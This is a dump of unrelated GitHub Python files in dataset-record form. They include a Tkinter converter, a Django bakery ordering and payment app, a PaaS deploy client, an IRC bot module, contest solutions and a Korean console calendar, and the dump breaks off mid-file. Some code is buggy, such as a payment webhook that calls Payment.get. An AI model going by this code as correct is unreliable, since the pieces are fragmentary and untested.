self.dismiss_button.grid(row=0, column=1)\n\n # closes export dialogue\n def close_export(self, partner):\n\n partner.export_button.config(state=NORMAL)\n self.export_box.destroy()\n\n\n\n# main routine\nif __name__ == \"__main__\":\n root = Tk()\n root.title(\"Temperature Converter\")\n something = Converter()\n root.mainloop()","repo_name":"KeananI/01_Temperature","sub_path":"09_Export_GUI.py","file_name":"09_Export_GUI.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37291483726","text":"import requests\nurl=\"https://www.epicurious.com/search/tofu%20chilli\"\nurl=\"https://en.wikipedia.org/wiki/Main_Page\"\nresponse=requests.get(url)\n# 200 es OK el resto ex 404 not found\nprint(response)\n# contenido de la respuesta, en este caso la web\n#utf-8 en principio sobra es por defecto\nrespuesta=response.content\n\nrespuesta=response.content.decode('utf-8')\nbusqueda='Did you know'\n#busca el texto dentro de lo que ha devuelto la pagina\nprint(respuesta.find(busqueda))\n","repo_name":"pedraki/curso_edx","sub_path":"edx/analytics/ana00.py","file_name":"ana00.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28469510534","text":"import os\nimport numpy as np\nfrom functools import reduce\n\n# DT and T data in a dictionary CAN become quite slow!\n# If updating storage of dt/t data to a np.array - need a different merge method\nclass DiagramData:\n def __init__(self, filenames, cfg):\n self.diagram_data = {}\n for filename in filenames: \n new_data = DiagramFileLoader(filename+\"{}.txt\".format(cfg)).data\n merge(self.diagram_data, new_data)\n\nclass DiagramFileLoader:\n def __init__(self, filename):\n if not os.path.exists(filename):\n raise SystemError(\"File does not exist! Tried loading {}\".format(filename))\n else:\n self.data = self.load_diagram_file(filename)\n\n def load_diagram_file(self,filename):\n self.diagram_data={}\n\n with open(filename, \"r\") as file:\n current_diagram=None\n for line in file:\n if line[0]==\"B\":\n current_diagram=line[:-1]\n self.diagram_data[current_diagram]={}\n else:\n data=line.split(' ')\n dt=int(data[0])\n t=int(data[1])\n value=complex(float(data[2]),float(data[3]))\n \n if dt in self.diagram_data[current_diagram]:\n self.diagram_data[current_diagram][dt][t]=value\n else:\n self.diagram_data[current_diagram][dt]={t: value}\n\n return self.diagram_data\n\n# from https://stackoverflow.com/questions/7204805/how-to-merge-dictionaries-of-dictionaries\ndef merge(a, b, path=None):\n #\"merges b into a\"\n if path is None: path = []\n for key in b:\n if key in a:\n if isinstance(a[key], dict) and isinstance(b[key], dict):\n merge(a[key], b[key], path + [str(key)])\n elif a[key] == b[key]:\n pass # same leaf value\n else:\n raise Exception('Conflict at %s' % '.'.join(path + [str(key)]))\n else:\n a[key] = b[key]\n return a\n\n# works\n#print(merge({1:{\"a\":\"A\"},2:{\"b\":\"B\"}}, {2:{\"c\":\"C\"},3:{\"d\":\"D\"}}))\n# has conflict\n#merge({1:{\"a\":\"A\"},2:{\"b\":\"B\"}}, {1:{\"a\":\"A\"},2:{\"b\":\"C\"}})","repo_name":"chrisculver/PyCorrelationMatrixManager","sub_path":"PyCorrelationMatrixManager/diagram_data.py","file_name":"diagram_data.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22809545997","text":"from typing import TYPE_CHECKING, Any, Dict, List, Optional, Union\n\nfrom paasng.engine.controller.client import ControllerClient\nfrom paasng.engine.controller.shortcuts import make_internal_client\nfrom paasng.engine.helpers import SlugbuilderInfo\n\nif TYPE_CHECKING:\n from paasng.dev_resources.sourcectl.models import VersionInfo\n\n\nclass EngineDeployClient:\n \"\"\"A high level client for engine\"\"\"\n\n def __init__(self, engine_app, controller_client: ControllerClient = None):\n self.engine_app = engine_app\n self.ctl_client = controller_client or make_internal_client()\n\n def start_build_process(\n self,\n version: 'VersionInfo',\n stream_channel_id: str,\n source_tar_path: str,\n procfile: dict,\n extra_envs: Dict[str, str],\n ) -> str:\n \"\"\"Start a new build process\"\"\"\n # get slugbuilder and buildpacks from engine_app\n build_info = SlugbuilderInfo.from_engine_app(self.engine_app)\n # 注入构建环境所需环境变量\n extra_envs = {**extra_envs, **build_info.environments}\n\n resp = self.ctl_client.app__build_processes(\n app_name=self.engine_app.name,\n region=self.engine_app.region,\n image=build_info.build_image,\n buildpacks=build_info.buildpacks_info,\n revision=version.revision,\n branch=version.version_name,\n stream_channel_id=stream_channel_id,\n source_tar_path=source_tar_path,\n procfile=procfile,\n extra_envs=extra_envs,\n )\n build_process_id = resp.get('uuid')\n return build_process_id\n\n def run_command(\n self, build_id: str, command: str, stream_channel_id: str, operator: str, type_: str, extra_envs: Dict\n ) -> str:\n \"\"\"run a command in a built slug.\"\"\"\n resp = self.ctl_client.app__run_command(\n region=self.engine_app.region,\n app_name=self.engine_app.name,\n build_id=build_id,\n command=command,\n stream_channel_id=stream_channel_id,\n operator=operator,\n type_=type_,\n extra_envs=extra_envs,\n )\n command_id = resp.get(\"uuid\")\n return command_id\n\n def get_command_status(self, command_id: str) -> Dict[str, Any]:\n \"\"\"Get current status of command\"\"\"\n resp = self.ctl_client.command__retrieve(\n region=self.engine_app.region, app_name=self.engine_app.name, command_id=command_id\n )\n return resp\n\n def update_config(self, runtime: Dict[str, Any]):\n \"\"\"Update engine-app's config\"\"\"\n payload = {\"runtime\": runtime}\n\n return self.ctl_client.update_app_config(\n app_name=self.engine_app.name,\n region=self.engine_app.region,\n payload=payload,\n )\n\n def create_release(\n self, build_id: str, deployment_id: Optional[str], extra_envs: Dict[str, str], procfile: Dict[str, str]\n ) -> str:\n \"\"\"Create a new release\"\"\"\n resp = self.ctl_client.app__release(\n app_name=self.engine_app.name,\n region=self.engine_app.region,\n build_id=build_id,\n deployment_id=deployment_id,\n extra_envs=extra_envs,\n procfile=procfile,\n )\n return resp['uuid']\n\n def get_release(self, release_id: str) -> dict:\n \"\"\"Get the release object by id\"\"\"\n return self.ctl_client.get_app_release(\n region=self.engine_app.region, app_name=self.engine_app.name, release_id=release_id\n )\n\n def create_build(self, extra_envs: Dict[str, str], procfile: Dict[str, str]) -> str:\n \"\"\"Create the **fake** build for Image Type App\"\"\"\n resp = self.ctl_client.create_build(\n region=self.engine_app.region,\n app_name=self.engine_app.name,\n procfile=procfile,\n env_variables=extra_envs,\n )\n return resp[\"uuid\"]\n\n def get_build(self, build_id: str) -> dict:\n \"\"\"Get the build object by id\"\"\"\n return self.ctl_client.get_app_build(\n region=self.engine_app.region, app_name=self.engine_app.name, build_id=build_id\n )\n\n def get_build_process_status(self, build_process_id: str) -> Dict[str, Any]:\n \"\"\"Get current status of build process\"\"\"\n resp = self.ctl_client.read_build_process_result(\n app_name=self.engine_app.name, region=self.engine_app.region, build_process_id=build_process_id\n )\n return resp\n\n def update_domains(self, domains: List[Dict]):\n \"\"\"Update an engine app's domains\"\"\"\n self.ctl_client.app_domains__update(\n region=self.engine_app.region, app_name=self.engine_app.name, domains=domains\n )\n\n def update_subpaths(self, subpaths: List[Dict]):\n \"\"\"Update an engine app's subpaths\"\"\"\n self.ctl_client.update_app_subpaths(\n region=self.engine_app.region, app_name=self.engine_app.name, subpaths=subpaths\n )\n\n def get_metadata(self) -> Dict[str, Any]:\n \"\"\"Get an engine app's metadata\"\"\"\n config = self.ctl_client.retrieve_app_config(region=self.engine_app.region, app_name=self.engine_app.name)\n return config['metadata'] or {}\n\n def update_metadata(self, metadata_part: Dict[str, Union[str, bool]]):\n \"\"\"Update an engine app's metadata, works like python's dict.update()\n\n :param metadata_part: An dict object which will be merged into app's metadata\n \"\"\"\n self.ctl_client.update_app_metadata(\n region=self.engine_app.region, app_name=self.engine_app.name, payload={'metadata': metadata_part}\n )\n\n def upsert_image_credentials(self, registry: str, username: str, password: str):\n \"\"\"Update an engine app's image credentials, which will be used to pull image.\"\"\"\n self.ctl_client.upsert_image_credentials(\n region=self.engine_app.region,\n app_name=self.engine_app.name,\n credentials={\"registry\": registry, \"username\": username, \"password\": password},\n )\n\n def sync_proc_ingresses(self):\n \"\"\"Sync ingresses configs with engine\"\"\"\n self.ctl_client.app_proc_ingress_actions__sync(region=self.engine_app.region, app_name=self.engine_app.name)\n","repo_name":"leafage-collb/bk-paas","sub_path":"apiserver/paasng/paasng/engine/deploy/engine_svc.py","file_name":"engine_svc.py","file_ext":"py","file_size_in_byte":6303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"35912283134","text":"from schema import Schema, And, Use\n\n\nAWS_KEYS_SECRET = 'churn-api-s3-keys'\nDATABASE_SECRET = 'churn-model-mysql'\nS3_BUCKET_NAME = 'churn-model-data-science-logs'\nSCHEMA_NAME = 'churn_model'\nSTAGE_URL = 'stage_url'\nPROD_URL = 'prod_url'\n\nCONFIG_SCHEMA = Schema([{\n 'proba_cutoff': And(Use(float), lambda n: 0.09 <= n <= 0.99)\n}])\n","repo_name":"micahmelling/config-framework","sub_path":"app_settings.py","file_name":"app_settings.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32116642123","text":"\n# software release number\nRELEASE = '0.82'\n\n# information string\nLEFT_INDENT = 10\nMIDDLE_SPACE = 80\nRIGHT_INDENT = 10\n\n# visio diagram steps descrition\nSWITCH_DESC = 'Switch pairs'\nISL_DESC = 'ISLs, ICLs, IFLs'\nNPIV_DESC = 'NPIV links'\nSTORAGE_DESC = 'Storages'\nSERVER_DESC = 'Servers'\nSWITCH_GROUPS_DESC = 'Switch groups'\n\n# colours for Visiso scheme\nHPE_PALETTE = {\n 'green': 'RGB(0,169,103)', \n 'red': 'RGB(255,141,109)', \n 'blue': 'RGB(42,210,201)', \n 'purple': 'RGB(97,71,103)'\n }\n\nRT_PALETTE = {\n 'grey': 'RGB(123,147,155)',\n 'orange': 'RGB(255,79,18)',\n 'purple': 'RGB(119,0,255)',\n 'black': 'RGB(16,24,40)' \n }\n\nCOLOUR_PALETTE = HPE_PALETTE\n\n# min connected device match ratio for the switch and the pair switch\nMIN_DEVICE_NUMBER_MATCH_RATIO = 0.5\n# min switch name match ratio for switch and the pair switch \nMIN_SW_NAME_MATCH_RATIO = 0.8\n\n# Direcotors with 4 slots\nDIR_4SLOTS_TYPE = [77, 121, 165, 179]\n# All directors (8-slots, 4-slots)\nDIRECTOR_TYPE = [42, 62, 77, 120, 121, 165, 166, 179, 180]","repo_name":"KonstantinAlxVlasenko/san_report_automation","sub_path":"san_automation_constants.py","file_name":"san_automation_constants.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41201035646","text":"import os\nfrom PIL import Image\n\n# parse all png files in current directory\ncurrentPath = os.getcwd()\npngFiles = [f for f in os.listdir(currentPath) if os.path.isfile(os.path.join(currentPath, f)) and f.endswith(\"png\")]\n\n# create thumbnails of all images\nTHUMBNAIL_WIDTH = 428\nTHUMBNAIL_MAX_HEIGHT = 400\nIMG_PREFIX = \"2nd/images/screenshots\"\nfor pngFile in pngFiles:\n\t# skip thumbnail files\n\tif pngFile.startswith(\"th-\"):\n\t\tcontinue\n\timg = Image.open(pngFile)\n\tpix = img.size\n\taspect = float(pix[0])/pix[1]\n\tnewSize = (THUMBNAIL_WIDTH, THUMBNAIL_WIDTH/aspect)\n\t# resize further if max height is exceeded\n\tif newSize[1] > THUMBNAIL_MAX_HEIGHT:\n\t\tnewSize = (THUMBNAIL_MAX_HEIGHT*aspect, THUMBNAIL_MAX_HEIGHT)\n\n\tnewSize = (int(newSize[0]), int(newSize[1]))\n\timg = img.resize(newSize, Image.ANTIALIAS)\n\tthPngFile = \"th-\" + pngFile\n\timg.save(thPngFile)\n\t\n\tline = \"{}/{}|{}|{}||{}/{}|{}|{}|click\".format(IMG_PREFIX, thPngFile, newSize[0], newSize[1],\n\t IMG_PREFIX, pngFile, pix[0], pix[1])\n\t\n\tprint(\"{{\"+line+\"}}\")\n\t\n","repo_name":"mazbrili/mastersim","sub_path":"www/xml/mastersim/2nd/images/screenshots/generate_image_links.py","file_name":"generate_image_links.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"20703628310","text":"class Solution:\n def carPooling(self, trips: List[List[int]], capacity: int) -> bool:\n trips.sort(key=lambda x:x[1])\n x=[]\n heapq.heapify(x)\n l=0\n while l0 and capacity<0:\n j=heapq.heappop(x)\n if j[0]<=trips[l][1]:\n capacity+=j[1]\n if capacity<0:\n return False\n heapq.heappush(x,(trips[l][2],trips[l][0]))\n l+=1\n return True\n \n","repo_name":"beimnet777/A2SV","sub_path":"Car Pooling.py","file_name":"Car Pooling.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"20908848584","text":"import uuid\n\nfrom yookassa import Payment as YooPayment\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.db import transaction\nfrom rest_framework.decorators import api_view\nfrom phonenumber_field.serializerfields import PhoneNumberField\nfrom rest_framework.response import Response\nfrom rest_framework.serializers import ModelSerializer, Serializer, CharField, EmailField\nfrom django.contrib.auth import authenticate, login, logout\n\n\nfrom .models import User, Order, OrderCake, Payment\n\n\nclass UserSerializer(Serializer):\n name = CharField(max_length=100)\n email = EmailField()\n phone = PhoneNumberField()\n\n class Meta:\n fields = ['name', 'phone', 'email']\n\n\nclass OrderSerializer(ModelSerializer):\n\n class Meta:\n model = Order\n fields = ['address', 'date', 'time', 'delivcomments', ]\n\n\nclass CakeSerializer(ModelSerializer):\n\n class Meta:\n model = OrderCake\n fields = ['levels', 'form', 'topping', 'berries', 'decor', 'words', 'comment', 'cost', ]\n\n\ndef index(request):\n return render(request, 'index.html')\n\n\ndef register_user(request):\n if 'name' in request.POST or 'email' in request.POST:\n user = request.user\n user.name = request.POST.get('name')\n user.email = request.POST.get('email')\n user.save()\n else:\n if request.POST['code'] == '1234':\n try:\n User.objects.get(phone=request.POST['phone'])\n except User.DoesNotExist:\n User.objects.create_user(phone=request.POST['phone'], password=request.POST['code'])\n\n user = authenticate(request, phone=request.POST['phone'], password=request.POST['code'])\n if user is not None:\n login(request, user)\n else:\n return redirect('start_page')\n return redirect('lk')\n\n\ndef logout_view(request):\n logout(request)\n\n return redirect('start_page')\n\n\ndef profile(request):\n orders = request.user.orders.all()\n\n return render(request, 'lk.html', {'orders': orders})\n\n\n@transaction.atomic\n@api_view(['POST'])\ndef register_order(request):\n request_payload = request.data\n cake_serializer = CakeSerializer(data=request_payload)\n cake_serializer.is_valid(raise_exception=True)\n order_serializer = OrderSerializer(data=request_payload)\n order_serializer.is_valid(raise_exception=True)\n user_serializer = UserSerializer(data=request_payload)\n user_serializer.is_valid(raise_exception=True)\n user = request.user\n if not user:\n user, _ = User.objects.get_or_create(\n phone=user_serializer.validated_data['phone'],\n defaults={\n 'name': user_serializer.validated_data['name'],\n 'email': user_serializer.validated_data['email'],\n 'password': 1234\n },\n )\n order, _ = Order.objects.get_or_create(\n address=order_serializer.validated_data['address'],\n date=order_serializer.validated_data['date'],\n time=order_serializer.validated_data['time'],\n delivcomments=order_serializer.validated_data.get('delivcomments', ''),\n user=user\n )\n cake = OrderCake.objects.create(\n levels=cake_serializer.validated_data['levels'],\n form=cake_serializer.validated_data['form'],\n topping=cake_serializer.validated_data['topping'],\n berries=cake_serializer.validated_data['berries'],\n decor=cake_serializer.validated_data['decor'],\n words=cake_serializer.validated_data.get('words', ''),\n comment=cake_serializer.validated_data.get('comment', ''),\n cost=cake_serializer.validated_data['cost'],\n order=order\n )\n payment = Payment.objects.create(order=order)\n yoo_payment = YooPayment.create({\n 'amount': {\n 'value': f'{cake.cost}',\n 'currency': 'RUB'\n },\n 'confirmation': {\n 'type': 'redirect',\n 'return_url': request.META.get('HTTP_REFERER')\n },\n 'capture': True,\n 'description': f'Заказ №{order.id}'\n }, uuid.uuid4())\n payment.yookassa_payment_id = yoo_payment.id\n payment.save()\n return redirect(yoo_payment.confirmation.confirmation_url)\n\n\n@api_view(['POST'])\ndef payment_update(request):\n event = request.data.get('event')\n if event == 'payment.succeeded':\n status = 'succeeded'\n elif event == 'payment.canceled':\n status = 'canceled'\n elif event == 'payment.waiting_for_capture':\n status = 'succeeded'\n else:\n return Response(status=403)\n payment = Payment.get(yookassa_payment_id=request.data['object']['id'])\n payment.status = status\n return Response()\n","repo_name":"Yar59/BakeCake","sub_path":"bakery/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74091889640","text":"import sys\nimport time\nfrom datetime import timedelta\nfrom event import Event\ntry:\n if sys.version_info > (3, 0, 0):\n from .basemodule import BaseModule\n else:\n from basemodule import BaseModule\nexcept (ImportError, SystemError):\n from modules.basemodule import BaseModule\n\n\nclass Uptime(BaseModule):\n def post_init(self):\n uptime_event = Event(\"__.uptime__\")\n uptime_event.define(msg_definition=\"^\\\\.uptime\")\n uptime_event.subscribe(self)\n self.help = \".uptime (spits out uptime)\"\n # register ourself to our new custom event\n self.bot.register_event(uptime_event, self)\n\n starttime = time.time()\n localtime = time.localtime()\n\n if 'uptime' not in self.bot.mem_store:\n self.bot.mem_store['uptime'] = dict()\n self.bot.mem_store['uptime']['localtime'] = localtime\n self.bot.mem_store['uptime']['starttime'] = starttime\n\n def handle(self, event):\n self._uptime(event.channel)\n\n def _uptime(self, channel):\n # print timedelta(seconds=time.time() - self.starttime)\n self.say(\n channel,\n \"I've been up \" +\n str(\n timedelta(\n seconds=time.time() -\n self.bot.mem_store['uptime']['starttime'])).split(\".\")[0] +\n \", since \" +\n time.strftime(\n \"%a, %d %b %Y %H:%M:%S -0800\",\n self.bot.mem_store['uptime']['localtime']))\n","repo_name":"hlmtre/pybot","sub_path":"modules/uptime.py","file_name":"uptime.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"18"} +{"seq_id":"19394539982","text":"\r\n#윤년 = True, 아니면 False\r\ndef LeapCheck(year): \r\n return (year % 4 == 0) and (year % 100 != 0) or (year % 400 == 0) \r\n\r\ndef lastDay(year, month):#그 달의 마지막날자를 반환\r\n m = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\r\n if LeapCheck(year):\r\n m[1] = 29\r\n return m[month - 1]\r\n\r\ndef totalDay(year, month, day): #총 날짜 반환\r\n total = 365*(year-1)\r\n\r\n for i in range(1, year): #전년도까지 윤년수\r\n if LeapCheck(i):\r\n total += 1\r\n \r\n for i in range(1, month): #전 달까지 날짜\r\n total += lastDay(year, i)\r\n \r\n return total + day\r\n\r\ndef weekDay(year, month, day): #월=0 ... 일=6\r\n return totalDay(year, month, day) % 7\r\n\r\ndef what_line(year, month, what_day): # 일정을 몇번째줄에 기입할지 반환\r\n line = 1\r\n start = 7 - weekDay(year, month, 1)\r\n while(True):\r\n if(what_day <= start): # 처음줄도 못지나감\r\n return line\r\n else:\r\n start = start + 7\r\n line = line + 1\r\n\r\ndef unicode_check(str): #한글인지 아닌지 확인하고 글자길이 반환\r\n str_len = 0\r\n for i in range(0, len(str)):\r\n check = str[i:i+1]\r\n if( ord(check)>=0 and ord(check)<=128 ): #아스키코드라면\r\n str_len = str_len + 1 # 글자 길이 1\r\n else: #한글이면\r\n str_len = str_len + 2 # 글자 길이 2\r\n return str_len \r\n\r\nbutton = 1 \r\nerror_code = 0\r\nwhile(True):\r\n what_day = 0\r\n \r\n next_line = 0 #몇번째줄인지 알려줌\r\n\r\n if(button == 1): # 다른달력 보기\r\n year = (input(\"\\n출력하고 싶은 년도을 입력해주세요(ex:2021): \"))\r\n if year.isdigit() == False:\r\n error_code = 1\r\n else:\r\n year = int(year)\r\n month = (input(\"출력하고 싶은 월을 입력해주세요(ex:06): \"))\r\n if month.isdigit() == False:\r\n error_code = 1\r\n else:\r\n month = int(month)\r\n if(month>0 and month<13): \r\n schedule = [[[0 for col in range(6)] for row in range(7)] for depth in range(5)] #schedule[5][7][6] = 0\r\n sp = [0]*31 #날짜 일정갯수 0초기화\r\n else:\r\n error_code = 2 \r\n\r\n elif(button == 2): # 일정추가\r\n what_day = (input(\"추가하고 싶은 일정의 날짜를 입력하세요(ex:13): \"))\r\n if what_day.isdigit() == False:\r\n error_code = 1\r\n else:\r\n what_day = int(what_day) \r\n\r\n if( (what_day < 1) or (what_day > lastDay(year,month)) ): #입력이 불가한 경우\r\n error_code = 2\r\n elif(sp[what_day-1] == 5):\r\n error_code = 3\r\n\r\n else:\r\n y = weekDay(year, month, what_day)#요일\r\n x = what_line(year, month, what_day)-1 # 몇번째줄\r\n\r\n schedule[sp[what_day-1]][y][x] = input(\"일정을 입력해주세요(5개까지 가능합니다.): \")\r\n if(unicode_check(schedule[sp[what_day-1]][y][x]) > 16):\r\n error_code = 4\r\n schedule[sp[what_day-1]][y][x] = 0 #다시 0으로 초기화\r\n else:\r\n sp[what_day-1] = sp[what_day-1] + 1 \r\n\r\n # 일정을 삭제함과 더불어 원래있던 숫자를 1씩올려주어야함\r\n elif(button == 3): #일정삭제\r\n del_day = (input(\"삭제하고 싶은 일정의 날짜를 알려주세요(ex:19): \"))\r\n if del_day.isdigit() == False:\r\n error_code = 1\r\n else:\r\n del_day = int(del_day)\r\n if( (del_day < 1) or (del_day > lastDay(year,month)) ):\r\n error_code = 2\r\n \r\n else: \r\n del_weekDay = weekDay(year, month, del_day) #요일\r\n del_num = (input(\"몇번째 일정을 삭제하시겠습니까?(ex:3): \"))\r\n if del_num.isdigit() == False:\r\n error_code = 1\r\n else:\r\n del_num = int(del_num)\r\n\r\n if( (del_num < 0) or (del_num > sp[del_day-1]) ):\r\n error_code = 5\r\n \r\n else:\r\n del_num = del_num - 1\r\n for i in range(del_num, 4): #사라진 일정을 빼고 차례대로 올리기\r\n schedule[i][del_weekDay][what_line(year, month, del_day)-1]=schedule[i+1][del_weekDay][what_line(year, month, del_day)-1]\r\n schedule[4][del_weekDay][what_line(year, month, del_day)-1] = 0\r\n sp[del_day-1] = sp[del_day-1] -1\r\n\r\n else:\r\n error_code = 6\r\n\r\n if(error_code == 0):\r\n print('=' * 148)\r\n print(' '*67, year, \"년 \", month, \"월\")\r\n print('=' * 148)\r\n print(' '*9, \"일\", ' '*17, \"월\", ' '*17, \"화\", ' '*17, \"수\", ' '*17, \"목\", ' '*17, \"금\", ' '*17, \"토\")\r\n print('=' * 148)\r\n\r\n for i in range(weekDay(year, month, 1)): \r\n print(' '*21, end = '')\r\n\r\n for i in range(1, lastDay(year, month) + 1): # i가 1부터 해당 달의 마지막 날짜의 수까지 변하는 동안\r\n print(' '*9,\"%2d\"%(i),' '*8, end = '') \r\n if weekDay(year, month, i) == 6 or i == lastDay(year, month): #다음줄로 넘어감\r\n \r\n for i in range(0, 5): #6번 반복\r\n print()\r\n for j in range(0, 7): #7번 반복\r\n if(schedule[i][j][next_line] != 0): #문자열이 들어있다면 \r\n print(i+1,schedule[i][j][next_line],' '*(16-unicode_check(schedule[i][j][next_line])),'|', end='') #문자열의 길이만큼빼서 출력\r\n\r\n else: #문자열이 안들어있다면\r\n print(' '*19,'|', end='')\r\n\r\n next_line = next_line + 1 \r\n print()\r\n print('_'*148) \r\n\r\n #error가 났다면 달력은 출력하지 않고 error코드 출력 \r\n else: \r\n print(\"\\n ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\")\r\n print(\"|  오류 발생!                   [-][口][×]|\") \r\n print(\"| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|\")\r\n if(error_code == 1):\r\n print(\"| 숫자를 입력 바랍니다. |\")\r\n elif(error_code == 2):\r\n print(\"| 날짜가 알맞지 않습니다. 다시 입력바랍니다. |\")\r\n elif(error_code == 3): \r\n print(\"| 일정이 가득 찼습니다. 더이상 채울 수 없습니다. |\") \r\n elif(error_code == 4): \r\n print(\"| 글자수가 초과되었습니다. 글자수를 줄여주십시오. |\")\r\n elif(error_code == 5):\r\n print(\"| 삭제 할 일정이 없습니다. |\")\r\n else:\r\n print(\"| 버튼 숫자가 알맞지 않습니다. |\") \r\n print(\"|                           |\")\r\n print(\"|                           |\")\r\n print(\" ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\\n\") \r\n error_code = 0\r\n\r\n button = int(input(\"1)다른달력보기\\n2)일정추가\\n3)일정삭제\\n4)종료\\n1,2,3,4 중 원하는 숫자를 입력후 enter클릭: \"))\r\n if(button == 4):\r\n break\r\n \r\n","repo_name":"softwareyong/2021learningfair","sub_path":"diary.py","file_name":"diary.py","file_ext":"py","file_size_in_byte":7969,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7535540485","text":"#!/usr/bin/python\n\ndef triple():\n '''Find all words with 3 double letters in a row. From,\n http://greenteapress.com/thinkpython/html/thinkpython010.html\n http://www.cartalk.com/content/puzzlers '''\n fin = open('./words.txt') ## word list to parse\n for word in fin:\n word = fin.readline()\n word = word.strip()\n char = 0\n length = len(word)\n while (char <= length - 6) and (length >=6):\n if word[char] == word[char+1]:\n if word[char+2] == word[char+3]:\n if word[char+4] == word[char+5]:\n return(word)\n char+=1\n\ntriple()\n\n\n\n\n","repo_name":"HasBob/IntroPython2015","sub_path":"students/bob/session02/cartalk/tripleletters.py","file_name":"tripleletters.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25583697189","text":"import sys\nsys.setrecursionlimit(1 << 25)\nread = sys.stdin.readline\nra = range\nenu = enumerate\n\n\ndef read_ints():\n return list(map(int, read().split()))\n\n\ndef read_a_int():\n return int(read())\n\n\ndef read_tuple(H):\n '''\n H is number of rows\n '''\n ret = []\n for _ in range(H):\n ret.append(tuple(map(int, read().split())))\n return ret\n\n\ndef read_col(H):\n '''\n H is number of rows\n A列、B列が与えられるようなとき\n ex1)A,B=read_col(H) ex2) A,=read_col(H) #一列の場合\n '''\n ret = []\n for _ in range(H):\n ret.append(list(map(int, read().split())))\n return tuple(map(list, zip(*ret)))\n\n\ndef read_matrix(H):\n '''\n H is number of rows\n '''\n ret = []\n for _ in range(H):\n ret.append(list(map(int, read().split())))\n return ret\n # return [list(map(int, read().split())) for _ in range(H)] # 内包表記はpypyでは遅いため\n\n\ndef read_map(H):\n '''\n H is number of rows\n 文字列で与えられた盤面を読み取る用\n '''\n return [read()[:-1] for _ in range(H)]\n\n\ndef read_map_as_int(H):\n '''\n # →1,.→0として読み込む\n '''\n ret = []\n for _ in range(H):\n ret.append([1 if s == '#' else 0 for s in read()[:-1]])\n # 内包表記はpypyでは若干遅いことに注意\n # #numpy使うだろうからこれを残しておくけど\n return ret\n\n\nMOD = 10**9 + 7\nINF = 2**63 # 2147483648 > 10**9\n# default import\nfrom collections import defaultdict, Counter, deque\nfrom operator import itemgetter\nfrom itertools import product, permutations, combinations\nfrom bisect import bisect_left, bisect_right # , insort_left, insort_right\nfrom heapq import heapify, heappop, heappush, heappushpop\n\n\nclass PriorityQueue:\n def __init__(self, heap):\n '''\n heap ... list\n '''\n self.heap = heap\n heapify(self.heap)\n\n def push(self, item):\n heappush(self.heap, item)\n\n def pop(self):\n return heappop(self.heap)\n\n def pushpop(self, item):\n return heappushpop(self.heap, item)\n\n def __call__(self):\n return self.heap\n\n def __len__(self):\n return len(self.heap)\n# s→tまでの最短経路はどうやってみ見つける?\n# grid bfs で 各点への最短距離\n# スタートから各店への最短距離たどってすでにならした地面はコスト0に置換\n# 再びgrid bfsで各店への最短距離を出す\n\n\nH, W = read_ints()\nA = read_matrix(H)\n\n\nmv = {(0, 1), (1, 0), (0, -1), (-1, 0)}\n\n\ndef bfs(A, si, sj):\n min_costs = [[INF] * W for _ in range(H)] # is_visited代わりでもある\n que = PriorityQueue([(0, si, sj)]) # (スタートの座標i,j,cost)\n min_costs[si][sj] = 0\n while que:\n c, i, j = que.pop() # cにはi,jまでの最小コスト\n for di, dj in mv:\n ni, nj = i + di, j + dj\n if not (0 <= ni < H and 0 <= nj < W):\n continue\n nc = c + A[ni][nj]\n if min_costs[ni][nj] <= nc: # >は通す\n continue\n min_costs[ni][nj] = nc\n que.push((nc, ni, nj))\n return min_costs\n\n\nmin_costs1 = bfs(A, H - 1, 0)\nmin_costs2 = bfs(A, 0, W - 1)\nmin_costs3 = bfs(A, H - 1, W - 1)\nans = INF\nfor i, j in product(range(H), range(W)):\n tmp = min_costs1[i][j] + min_costs2[i][j] + min_costs3[i][j] - 2 * A[i][j]\n ans = min(ans, tmp)\n\n\nprint(ans)\n","repo_name":"masakiaota/kyoupuro","sub_path":"virtual/past201912-open/j/j2.py","file_name":"j2.py","file_ext":"py","file_size_in_byte":3431,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"6216845994","text":"import pytest\n\nfrom app.src.exceptions import 